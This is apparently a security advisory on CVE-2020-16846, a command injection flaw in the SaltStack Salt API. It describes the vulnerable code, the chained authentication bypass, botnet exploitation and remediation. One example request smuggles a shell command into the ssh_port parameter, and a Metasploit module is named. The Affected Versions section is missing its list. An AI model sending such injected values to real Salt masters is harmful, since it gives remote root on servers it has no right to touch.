CVE-2020-16846

What is SaltStack Salt?

SaltStack Salt (now maintained as the Salt Project under VMware / Broadcom) is an open-source infrastructure automation and configuration management framework. It enables administrators to manage thousands of servers simultaneously — running commands, distributing configuration, deploying software, and orchestrating workflows across data centers and cloud environments.

Salt exposes its functionality over HTTP/HTTPS via the Salt API (rest_cherrypy), making it accessible to automation tooling and scripts. The API also supports a salt-ssh client mode that drives remote systems over SSH rather than requiring the Salt minion daemon to be installed. This SSH client mode is the source of CVE-2020-16846.

Overview

CVE-2020-16846 is a critical (CVSS 9.8) OS command injection vulnerability in the SaltStack Salt API's SSH client. An unauthenticated attacker with network access to the Salt API can execute arbitrary shell commands on the Salt master — the central control server — by injecting shell metacharacters into parameters passed to the /run API endpoint.

The vulnerability is typically chained with CVE-2020-25592 (authentication bypass in the Salt API's eauth/token validation), enabling pre-authenticated remote root in a single HTTP request. Rapid7 demonstrated achieving full pre-auth remote root in under 15 minutes.

Patches were released November 2, 2020. Active exploitation followed within weeks via the Sysrv-hello cryptomining botnet, which used this vulnerability to compromise Windows and Linux servers and deploy an XMRig Monero miner.

Affected Versions

All earlier branches (2019.2.x and older) are also affected.

Technical Details

The vulnerability exists in how the Salt API passes user-supplied parameters to the salt-ssh subprocess. When the /run endpoint is called with client=ssh, several input parameters — ssh_priv, tgt, ssh_options, ssh_port, ssh_remote_port_forwards — are interpolated directly into shell command strings without sanitization.

The original code used subprocess.Popen with shell=True, which passes the assembled command string to /bin/sh. Shell metacharacters (semicolons, pipes, backticks, $() substitution) in any of these parameters are interpreted by the shell, enabling arbitrary command execution.

POST /run HTTP/1.1
{
  "client": "ssh",
  "tgt": "target",
  "fun": "test.ping",
  "ssh_port": "22;id>/tmp/pwn",
  "eauth": "auto",
  "username": "...",
  "password": "..."
}

The fix replaced shell-based invocation with a safe array-form subprocess.call, preventing metacharacter interpretation.

CVE-2020-25592 (auth bypass): The Salt API's eauth and token authentication validation contained a logic flaw that allowed any request to bypass authentication checks. Combining this with CVE-2020-16846 removed the authentication requirement entirely, yielding pre-authenticated remote root on internet-exposed Salt masters.

Discovery

CVE-2020-16846 and the companion CVE-2020-17490 were discovered by researcher "KPC" via the Trend Micro Zero Day Initiative (ZDI), credited across ZDI advisories ZDI-20-1379 through ZDI-20-1383.

Exploitation Context

Rapid7 scanned the internet in November 2020 and found approximately 215 exposed and vulnerable Salt API instances. Exploitation began within weeks of the patch release.

The primary exploitation vehicle was the Sysrv-hello botnet (also tracked as Sysrv), first identified by Alibaba Cloud security researchers in February 2021 and active from at least December 2020. The botnet exploited CVE-2020-16846 (chained with CVE-2020-25592) to drop XMRig Monero cryptomining software on both Windows and Linux hosts. Juniper Threat Labs documented a major Sysrv activity surge in March 2021.

The attack pattern was consistent with earlier SaltStack exploitation: in May 2020, CVE-2020-11651 and CVE-2020-11652 (different Salt authentication bypass vulnerabilities) were exploited for cryptomining within days of disclosure, establishing Salt masters as a standing target for opportunistic attackers.

A Metasploit module (exploits/linux/http/saltstack_salt_api_cmd_exec) was published for CVE-2020-16846, lowering the technical bar for exploitation.

Remediation

1. Upgrade Salt to 3002.1, 3001.2, or 3000.4 (or any later release). Both CVE-2020-16846 and CVE-2020-25592 are fixed in these releases.

2. Restrict Salt API network access — the Salt API should never be directly internet-exposed. Place it behind a firewall or VPN and restrict access to trusted management hosts only.

3. Disable the SSH client if unused — if your environment uses the Salt minion daemon rather than salt-ssh, disable the SSH client in the Salt API configuration to eliminate the vulnerable code path.

4. Rotate credentials — if your Salt master was internet-exposed before patching, treat all credentials, keys, and secrets accessible from the Salt master as potentially compromised.

5. Audit for compromise — review Salt API logs for unexpected /run requests with client=ssh. Look for new processes spawned from the Salt API worker, unexpected cron jobs, and cryptominer processes (high CPU on server processes or xmrig in the process list).